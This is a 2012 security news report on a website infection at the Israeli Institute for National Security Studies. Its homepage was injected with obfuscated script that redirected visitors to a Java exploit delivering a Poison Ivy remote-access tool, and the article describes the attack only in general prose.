Share

Related Links

Top 5 Stories

News

Website infection hits Israeli Institute for National Security Studies

04 May 2012

Israeli websites frequently come under cyber attack. Now Websense reports that the Israeli Institute for National Security Studies (INSS) has been infected with malicious code ultimately leading to a Poison Ivy variant.

The malicious code, found on the home page, is injected into a table as a Javascript ‘document.write’ function, with an iFrame containing the exploit URL obfuscated as a decimal-encoded string. The result is that the user is covertly redirected to the exploit while the legitimate page is still loading. 

The obfuscated encoding is not the only evasion technique used by the attacker. The exploit file, test.jar (a Java ARchive file) contains both the exploit and a large compressed file (104 MB when decompressed) containing a huge number of ‘a’ characters. “We think that this is a technique that attempts to evade automated malware analysis technologies,” writes Websense, “since some of those systems typically avoid downloading the contents of big files, because malware tends to be small in size.”

The exploit itself uses the same Java vulnerability behind the recent rash of Flashback infections. If successful it installs a variant of Poison Ivy, a remote administration tool (RAT) that allows the command and control server to take complete remote control of the infected computer.

“We have contacted the Webmaster of the website,” said Websense, “and notified them on the issue and the location of the injected code on the website, so far, we haven't heard back from them.” At the time of writing this report, VirusTotal reported just one out of 24 scanning tools returned the URL as a ‘malware site’. It would be wise to treat with caution. However, since the delivered malware is no longer new, most AV products can detect and remove it – and of course the latest versions of Java are patched against the vulnerability.

What isn’t certain, however, is whether INSS was specifically targeted by hackers, or just caught in a wider dragnet. “We don't have any information on where the threat originated,” Sophos senior technology consultant Graham Cluley told Infosecurity, “or whether it was targeted against the Israeli website.  However, we do see attacks like this on many other websites, so it is very possible that there is a chance that it was affected.” Websense doesn’t believe “that this latest infection is part of an organized mass infection campaign,” but similarly “can't determine that the infection of this website with exploit code is part of a targeted attack.”

This article is featured in:
Internet and Network Security  •  Malware and Hardware Security

 

Comment on this article

You must be registered and logged in to leave a comment about this article.

We use cookies to operate this website and to improve its usability. Full details of what cookies are, why we use them and how you can manage them can be found by reading our Privacy & Cookies page. Please note that by using this site you are consenting to the use of cookies. ×